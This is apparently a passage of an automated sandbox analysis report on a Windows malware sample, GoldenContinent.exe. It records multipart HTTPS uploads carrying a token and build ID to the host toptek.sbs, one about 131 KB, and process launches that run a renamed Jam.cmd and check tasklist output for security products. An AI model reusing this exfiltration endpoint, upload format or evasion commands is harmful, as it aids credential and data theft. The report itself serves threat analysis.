                                                                                                                                                                                                                                                                          Data Ascii: ------JE3OPZM79H47QI589ZCBContent-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------JE3OPZM79H47QI589ZCBContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------JE3OPZM79H47QI589ZCBCont
                                                                                                                                                                                                                                                                          2024-12-22 21:48:20 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:48:20 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-22 21:48:20 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          26192.168.2.44983594.130.188.574437576C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-22 21:48:23 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----Q1NGDT0R9H4EU37QIMYM
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: toptek.sbs
                                                                                                                                                                                                                                                                          Content-Length: 131413
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-22 21:48:23 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 51 31 4e 47 44 54 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 35 36 32 38 64 35 36 35 31 33 31 30 32 61 63 38 31 63 34 63 66 39 39 31 32 32 61 35 31 32 0d 0a 2d 2d 2d 2d 2d 2d 51 31 4e 47 44 54 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 51 31 4e 47 44 54 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------Q1NGDT0R9H4EU37QIMYMContent-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------Q1NGDT0R9H4EU37QIMYMContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------Q1NGDT0R9H4EU37QIMYMCont
                                                                                                                                                                                                                                                                          2024-12-22 21:48:23 UTC16355OUTData Raw: 6d 76 57 77 53 64 43 71 70 55 6c 79 33 30 66 33 6e 6e 34 36 6e 54 72 30 57 71 6d 74 6b 32 76 75 50 48 61 4b 4b 4b 2b 33 50 7a 77 4b 44 52 52 51 41 6c 65 68 2f 43 37 2f 6b 58 39 51 2f 37 43 4d 6e 2f 41 4b 41 6c 65 65 34 72 30 4c 34 58 66 38 69 2f 71 48 2f 59 52 6b 2f 39 41 53 76 6e 38 39 2f 35 64 65 72 2f 41 43 50 73 4f 46 76 34 65 4a 39 49 2f 6d 64 76 58 4e 2b 48 50 45 6b 75 73 36 6c 71 46 70 4e 48 45 76 6b 66 4e 48 35 59 4f 51 75 39 6c 32 76 6e 2b 4c 35 51 65 50 58 32 72 6f 4a 35 34 72 57 33 6b 75 4a 6e 43 52 52 4b 58 64 6a 30 41 48 4a 4e 65 56 2b 46 66 46 4e 74 70 2b 71 36 70 71 6c 31 46 2f 6f 2b 70 53 74 4b 35 68 51 73 31 75 51 78 32 68 2b 4d 66 4e 75 39 65 76 58 72 58 7a 56 61 71 6f 54 69 6d 37 48 32 65 42 77 62 78 47 48 72 53 6a 47 37 56 72 65 74 2f
                                                                                                                                                                                                                                                                          Data Ascii: mvWwSdCqpUly30f3nn46nTr0Wqmtk2vuPHaKKK+3PzwKDRRQAleh/C7/kX9Q/7CMn/AKAlee4r0L4Xf8i/qH/YRk/9ASvn89/5der/ACPsOFv4eJ9I/mdvXN+HPEkus6lqFpNHEvkfNH5YOQu9l2vn+L5QePX2roJ54rW3kuJnCRRKXdj0AHJNeV+FfFNtp+q6pql1F/o+pStK5hQs1uQx2h+MfNu9evXrXzVaqoTim7H2eBwbxGHrSjG7Vret/
                                                                                                                                                                                                                                                                          2024-12-22 21:48:23 UTC16355OUTData Raw: 55 74 4a 51 41 55 68 70 61 4b 41 45 6f 6f 6f 6f 41 4b 4b 4b 4b 42 69 55 55 70 70 4b 41 45 6f 70 61 54 46 4d 41 70 4b 57 69 67 42 4b 4b 57 69 67 59 6c 46 46 46 41 41 61 4b 4b 53 6d 41 55 47 69 69 67 59 6c 46 4b 61 53 67 42 4b 4b 57 6b 70 6a 43 69 69 69 67 41 70 4b 57 6a 6d 67 42 4d 55 6c 4c 32 6f 70 6a 45 6f 6f 4e 46 41 43 55 55 74 46 4f 34 43 55 55 59 70 4d 55 46 43 35 78 54 68 49 65 2f 49 39 36 5a 52 54 46 5a 44 2f 77 42 32 33 56 63 65 34 70 76 6b 67 2f 64 66 38 44 53 55 55 57 51 39 52 6a 52 4f 76 55 55 79 72 41 63 6a 76 53 6c 77 33 33 6c 42 70 57 48 7a 4d 72 55 56 4f 59 34 32 36 45 6a 36 30 78 6f 48 2f 68 2b 59 65 31 4b 78 53 6b 69 4d 30 68 36 55 70 42 48 55 59 6f 35 6f 47 68 74 46 4c 53 47 67 59 6c 46 4c 52 54 47 4a 53 55 74 46 41 58 45 70 4b 57 69 67
                                                                                                                                                                                                                                                                          Data Ascii: UtJQAUhpaKAEooooAKKKKBiUUppKAEopaTFMApKWigBKKWigYlFFFAAaKKSmAUGiigYlFKaSgBKKWkpjCiiigApKWjmgBMUlL2opjEooNFACUUtFO4CUUYpMUFC5xThIe/I96ZRTFZD/wB23Vce4pvkg/df8DSUUWQ9RjROvUUyrAcjvSlw33lBpWHzMrUVOY426Ej60xoH/h+Ye1KxSkiM0h6UpBHUYo5oGhtFLSGgYlFLRTGJSUtFAXEpKWig
                                                                                                                                                                                                                                                                          2024-12-22 21:48:23 UTC16355OUTData Raw: 70 43 6f 6a 39 73 6c 6e 56 65 6e 42 4a 34 34 72 6e 68 4e 71 63 4f 70 53 33 61 61 57 67 69 61 2f 73 72 71 47 32 6a 6b 49 57 47 4f 32 33 62 59 68 6b 48 71 47 36 2b 75 54 67 35 71 4b 30 2f 74 65 32 69 30 79 49 32 69 4f 74 6c 71 4b 33 68 59 4d 51 38 73 61 4f 5a 45 68 4a 78 39 30 4d 30 68 7a 6a 2b 49 65 67 72 44 32 75 59 4f 54 64 6e 72 2b 47 33 34 72 55 36 58 51 79 72 6b 55 65 5a 61 57 31 37 37 33 76 36 2f 35 47 32 6c 79 67 38 50 52 61 6c 4c 61 61 69 73 4c 32 39 31 4d 2b 6f 63 66 5a 6f 57 69 65 52 45 52 76 6b 35 4c 46 46 47 4e 77 4f 57 47 42 32 70 69 36 6c 59 7a 53 77 36 66 45 6c 34 74 2f 4c 70 69 58 30 63 72 4f 6a 52 4f 35 68 45 70 54 62 73 42 55 45 5a 41 4f 34 38 34 34 72 49 74 68 63 52 57 64 6f 33 39 6b 7a 6a 55 72 4f 33 75 62 65 47 59 33 58 37 6b 72 4d 30
                                                                                                                                                                                                                                                                          Data Ascii: pCoj9slnVenBJ44rnhNqcOpS3aaWgia/srqG2jkIWGO23bYhkHqG6+uTg5qK0/te2i0yI2iOtlqK3hYMQ8saOZEhJx90M0hzj+IegrD2uYOTdnr+G34rU6XQyrkUeZaW1773v6/5G2lyg8PRalLaaisL291M+ocfZoWieRERvk5LFFGNwOWGB2pi6lYzSw6fEl4t/LpiX0crOjRO5hEpTbsBUEZAO4844rIthcRWdo39kzjUrO3ubeGY3X7krM0
                                                                                                                                                                                                                                                                          2024-12-22 21:48:23 UTC16355OUTData Raw: 47 61 62 6d 6a 4e 41 37 44 68 39 34 56 76 58 58 2f 41 42 38 48 2f 64 58 2b 51 72 6e 77 65 61 31 5a 64 51 74 35 48 33 62 6e 48 41 34 32 2b 31 5a 56 45 2b 5a 4d 46 75 53 30 5a 71 74 39 74 74 2f 37 7a 2f 38 41 66 4e 4a 39 74 67 2f 76 50 2f 33 7a 53 73 79 79 31 6d 6a 4e 56 66 74 30 48 71 33 2f 41 48 7a 53 66 62 6f 50 56 2f 38 41 76 6d 69 7a 47 57 38 30 5a 71 70 39 75 67 39 58 2f 4b 6a 37 66 42 36 76 2b 56 4f 7a 41 74 5a 35 6f 71 70 39 76 67 39 58 2f 4b 6a 37 66 42 36 76 2f 77 42 38 30 57 59 79 33 52 6d 71 6e 32 2b 44 31 66 38 41 4b 6a 37 66 42 36 76 2b 56 46 6d 42 61 34 6f 7a 56 54 37 66 42 2f 74 2f 6c 52 2f 61 4d 47 65 72 2f 6c 54 73 78 32 4c 64 47 61 71 66 32 6a 62 2b 72 2f 6c 52 2f 61 4d 48 2b 33 2b 56 46 6d 46 69 31 4b 4d 32 64 31 2f 31 79 2f 71 4b 7a 39
                                                                                                                                                                                                                                                                          Data Ascii: GabmjNA7Dh94VvXX/AB8H/dX+Qrnwea1ZdQt5H3bnHA42+1ZVE+ZMFuS0Zqt9tt/7z/8AfNJ9tg/vP/3zSsyy1mjNVft0Hq3/AHzSfboPV/8AvmizGW80Zqp9ug9X/Kj7fB6v+VOzAtZ5oqp9vg9X/Kj7fB6v/wB80WYy3Rmqn2+D1f8AKj7fB6v+VFmBa4ozVT7fB/t/lR/aMGer/lTsx2LdGaqf2jb+r/lR/aMH+3+VFmFi1KM2d1/1y/qKz9
                                                                                                                                                                                                                                                                          2024-12-22 21:48:23 UTC16355OUTData Raw: 30 68 4e 4c 32 63 53 72 47 6d 4c 32 31 62 72 35 69 66 68 6d 6e 43 65 33 62 70 4f 50 78 47 4b 79 61 4b 58 73 30 4f 35 73 67 71 66 75 75 6a 66 52 71 58 44 65 6c 59 6e 53 6c 44 75 70 2b 56 32 48 30 4e 4c 6b 48 63 32 44 6b 64 71 4d 31 6d 43 37 6e 58 70 4b 33 34 38 30 39 64 51 6d 2f 69 43 4e 39 56 70 63 6a 4b 75 61 42 4e 4a 6d 71 67 31 48 2b 39 44 2b 52 70 77 76 6f 54 31 56 78 2b 74 4c 6c 59 37 6c 6e 4e 46 51 69 35 74 7a 2f 79 30 78 39 52 55 69 75 6a 2f 64 6b 52 76 6f 61 4c 44 47 33 42 2f 77 42 43 6e 2f 33 52 2f 4f 71 75 6e 66 36 79 54 2f 64 2f 72 56 71 35 42 2b 78 54 66 51 66 7a 71 70 70 33 33 35 66 39 33 2b 74 4f 4f 78 50 55 76 30 6e 46 49 44 53 38 55 69 30 46 49 61 4b 4b 42 68 51 61 4b 53 67 42 61 4d 30 6c 46 4d 41 78 52 37 55 55 6c 41 43 35 6f 6f 70 4b 41
                                                                                                                                                                                                                                                                          Data Ascii: 0hNL2cSrGmL21br5ifhmnCe3bpOPxGKyaKXs0O5sgqfuujfRqXDelYnSlDup+V2H0NLkHc2DkdqM1mC7nXpK34809dQm/iCN9VpcjKuaBNJmqg1H+9D+RpwvoT1Vx+tLlY7lnNFQi5tz/y0x9RUiuj/dkRvoaLDG3B/wBCn/3R/Oqunf6yT/d/rVq5B+xTfQfzqpp335f93+tOOxPUv0nFIDS8Ui0FIaKKBhQaKSgBaM0lFMAxR7UUlAC5oopKA
                                                                                                                                                                                                                                                                          2024-12-22 21:48:23 UTC16355OUTData Raw: 4b 42 69 47 69 67 30 55 77 43 69 69 69 67 59 6c 46 46 46 41 42 53 59 70 61 4b 41 45 6f 6f 37 55 55 44 43 6b 70 61 53 67 41 6f 6f 70 4b 42 68 52 52 52 51 41 6c 46 46 46 41 77 70 4b 57 6b 6f 41 4b 4b 4b 4b 42 67 61 53 6c 70 4b 41 43 6b 6f 6f 6f 47 46 46 46 4a 54 41 4b 4b 4b 53 67 59 55 55 55 55 41 46 4a 52 52 51 41 55 6c 4c 53 55 44 43 6b 70 54 53 55 44 43 6b 6f 6f 6f 47 67 70 4b 55 30 6c 41 43 45 30 55 55 55 44 45 7a 52 52 52 51 4d 51 30 55 47 6a 4e 4d 59 5a 70 44 52 53 47 6d 41 63 30 6c 4c 53 63 55 57 4b 43 6b 78 53 46 73 64 4b 61 53 61 41 73 4f 50 48 65 6b 4c 44 30 70 74 4a 52 63 71 77 70 59 30 32 6c 70 44 53 47 46 4a 53 30 6c 41 78 4b 4b 44 52 51 4d 44 54 61 63 61 62 51 4d 53 69 6c 4e 4a 51 55 46 4a 51 61 53 67 41 37 30 6c 4c 33 70 44 51 4d 4b 53 6c 70
                                                                                                                                                                                                                                                                          Data Ascii: KBiGig0UwCiiigYlFFFABSYpaKAEoo7UUDCkpaSgAoopKBhRRRQAlFFFAwpKWkoAKKKKBgaSlpKACkoooGFFFJTAKKKSgYUUUUAFJRRQAUlLSUDCkpTSUDCkoooGgpKU0lACE0UUUDEzRRRQMQ0UGjNMYZpDRSGmAc0lLScUWKCkxSFsdKaSaAsOPHekLD0ptJRcqwpY02lpDSGFJS0lAxKKDRQMDTacabQMSilNJQUFJQaSgA70lL3pDQMKSlp
                                                                                                                                                                                                                                                                          2024-12-22 21:48:23 UTC16355OUTData Raw: 55 55 55 55 44 45 70 4b 57 6b 6f 47 46 4a 53 30 6c 4d 59 55 6c 4c 53 55 44 45 6f 4e 46 42 6f 47 68 4b 53 6c 70 4b 41 43 6d 6d 6e 55 30 30 44 43 69 69 69 67 59 6c 4a 51 61 4b 42 67 61 53 69 69 67 59 6c 46 46 46 41 78 4b 53 67 30 55 44 51 55 6c 46 4a 33 6f 47 4c 53 47 67 30 47 67 42 4b 54 74 52 52 51 55 4a 53 47 6e 47 6d 6d 67 61 46 70 4b 4b 4b 42 69 66 53 6b 70 61 53 67 42 44 7a 52 51 65 61 4b 43 68 4d 38 55 6e 57 6c 4e 4a 51 4d 4b 53 6c 70 74 41 42 52 33 70 61 54 70 51 4d 53 69 6a 70 52 6d 67 59 68 70 4b 58 4e 49 66 38 41 39 56 41 77 70 4b 50 65 67 39 61 42 68 32 70 4f 74 42 6f 37 39 61 41 44 2f 50 57 6b 7a 2f 6b 30 47 69 67 6f 53 67 2f 6c 52 32 6f 48 61 67 41 7a 31 7a 53 45 2f 55 30 5a 35 6f 7a 51 4d 54 47 4f 39 46 4c 2b 76 76 69 6b 46 41 78 4f 39 42 6f
                                                                                                                                                                                                                                                                          Data Ascii: UUUUDEpKWkoGFJS0lMYUlLSUDEoNFBoGhKSlpKACmmnU00DCiiigYlJQaKBgaSiigYlFFFAxKSg0UDQUlFJ3oGLSGg0GgBKTtRRQUJSGnGmmgaFpKKKBifSkpaSgBDzRQeaKChM8UnWlNJQMKSlptABR3paTpQMSijpRmgYhpKXNIf8A9VAwpKPeg9aBh2pOtBo79aAD/PWkz/k0GigoSg/lR2oHagAz1zSE/U0Z5ozQMTGO9FL+vvikFAxO9Bo
                                                                                                                                                                                                                                                                          2024-12-22 21:48:23 UTC573OUTData Raw: 68 69 77 79 56 32 51 34 4f 52 7a 38 37 41 63 6e 6e 6d 62 50 78 50 34 67 30 2b 31 2b 79 32 57 75 61 6c 62 32 32 53 66 4a 69 75 6e 56 4f 65 76 79 67 34 35 37 2b 74 52 72 34 67 31 69 50 56 35 74 56 68 31 4b 36 67 76 35 69 64 39 78 62 79 6d 4a 6a 6e 71 50 6c 78 67 64 4f 42 78 77 4b 4c 42 63 39 4f 67 31 32 61 37 4d 65 70 61 44 50 63 53 58 45 32 74 57 56 68 63 58 4f 30 72 4a 65 52 72 44 6a 4d 67 37 69 52 67 78 49 50 58 41 7a 79 4b 79 37 36 57 61 78 74 74 55 30 53 34 31 4b 4f 4f 77 31 4f 5a 72 62 53 4c 43 57 54 62 42 44 46 39 6f 4a 2b 30 74 2f 43 67 47 31 67 47 2b 38 63 6b 39 4f 54 78 4a 38 55 65 49 47 75 5a 72 6c 74 64 31 4d 33 45 30 66 6c 53 79 6d 37 6b 33 4f 6e 39 31 6a 6e 4a 58 6b 38 48 6a 6d 6b 2f 34 53 62 58 76 37 4e 2f 73 33 2b 32 39 53 2b 77 62 50 4c 2b
                                                                                                                                                                                                                                                                          Data Ascii: hiwyV2Q4ORz87AcnnmbPxP4g0+1+y2Wualb22SfJiunVOevyg457+tRr4g1iPV5tVh1K6gv5id9xbymJjnqPlxgdOBxwKLBc9Og12a7MepaDPcSXE2tWVhcXO0rJeRrDjMg7iRgxIPXAzyKy76WaxttU0S41KOOw1OZrbSLCWTbBDF9oJ+0t/CgG1gG+8ck9OTxJ8UeIGuZrltd1M3E0flSym7k3On91jnJXk8Hjmk/4SbXv7N/s3+29S+wbPL+
                                                                                                                                                                                                                                                                          2024-12-22 21:48:24 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:48:24 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-22 21:48:24 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          27192.168.2.44984194.130.188.574437576C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-22 21:48:26 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----26XB16PZUA1VAASJ5PHV
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: toptek.sbs
                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-22 21:48:26 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 32 36 58 42 31 36 50 5a 55 41 31 56 41 41 53 4a 35 50 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 35 36 32 38 64 35 36 35 31 33 31 30 32 61 63 38 31 63 34 63 66 39 39 31 32 32 61 35 31 32 0d 0a 2d 2d 2d 2d 2d 2d 32 36 58 42 31 36 50 5a 55 41 31 56 41 41 53 4a 35 50 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 32 36 58 42 31 36 50 5a 55 41 31 56 41 41 53 4a 35 50 48 56 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------26XB16PZUA1VAASJ5PHVContent-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------26XB16PZUA1VAASJ5PHVContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------26XB16PZUA1VAASJ5PHVCont
                                                                                                                                                                                                                                                                          2024-12-22 21:48:27 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:48:27 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-22 21:48:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          28192.168.2.44985294.130.188.574437576C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-22 21:48:29 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----8Q9RQQQQ1DJMYU379R16
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: toptek.sbs
                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-22 21:48:29 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 38 51 39 52 51 51 51 51 31 44 4a 4d 59 55 33 37 39 52 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 35 36 32 38 64 35 36 35 31 33 31 30 32 61 63 38 31 63 34 63 66 39 39 31 32 32 61 35 31 32 0d 0a 2d 2d 2d 2d 2d 2d 38 51 39 52 51 51 51 51 31 44 4a 4d 59 55 33 37 39 52 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 38 51 39 52 51 51 51 51 31 44 4a 4d 59 55 33 37 39 52 31 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------8Q9RQQQQ1DJMYU379R16Content-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------8Q9RQQQQ1DJMYU379R16Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------8Q9RQQQQ1DJMYU379R16Cont
                                                                                                                                                                                                                                                                          2024-12-22 21:48:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:48:29 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-22 21:48:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                                                          Start time:16:46:55
                                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\GoldenContinent.exe"
                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                          File size:1'122'075 bytes
                                                                                                                                                                                                                                                                          MD5 hash:7BC8C8C16081E8D9CEBCCE0D93BC5F8D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                                                                                          Start time:16:46:56
                                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c move Jam Jam.cmd & Jam.cmd
                                                                                                                                                                                                                                                                          Imagebase:0x240000
                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                                                                          Start time:16:46:56
                                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                                                          Start time:16:46:58
                                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:tasklist
                                                                                                                                                                                                                                                                          Imagebase:0xdb0000
                                                                                                                                                                                                                                                                          File size:79'360 bytes
                                                                                                                                                                                                                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                                                                          Start time:16:46:58
                                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                                                          Imagebase:0x4d0000
                                                                                                                                                                                                                                                                          File size:29'696 bytes
                                                                                                                                                                                                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                                                                          Start time:16:46:59
                                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:tasklist
                                                                                                                                                                                                                                                                          Imagebase:0xdb0000
                                                                                                                                                                                                                                                                          File size:79'360 bytes
                                                                                                                                                                                                                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
